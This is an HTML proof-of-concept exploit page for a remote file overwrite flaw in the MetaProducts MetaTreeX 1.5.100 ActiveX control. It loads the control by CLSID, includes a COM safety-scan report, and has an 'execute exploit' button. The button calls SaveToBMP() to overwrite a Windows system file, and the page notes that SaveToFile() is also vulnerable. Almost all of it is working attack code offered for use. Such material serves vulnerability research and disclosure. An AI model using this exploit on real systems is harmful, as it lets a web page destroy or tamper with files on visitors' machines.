<HTML> <BODY>
<b> Author: Houssamix <br/> <br/> <br/>
MetaProducts MetaTreeX V 1.5.100 Remote File Overwrite Exploit <br/>
Note: SaveToFile() is vulnerable too <br/>
</b>
<object id=hsmx classid="clsid:{67E66985-F81A-11D6-BC0F-F7B40157DC26}"></object>
<SCRIPT>
/*
Report for Clsid: {67E66985-F81A-11D6-BC0F-F7B40157DC26}
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller,data
IPStorage Safe: Safe for untrusted: caller,data
*/
function hehe() {
    // Path passed to the control's SaveToBMP() method; the file at this path is overwritten
    File = "c:\\windows\\system_.ini"
    hsmx.SaveToBMP(File)
}
</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body> </HTML>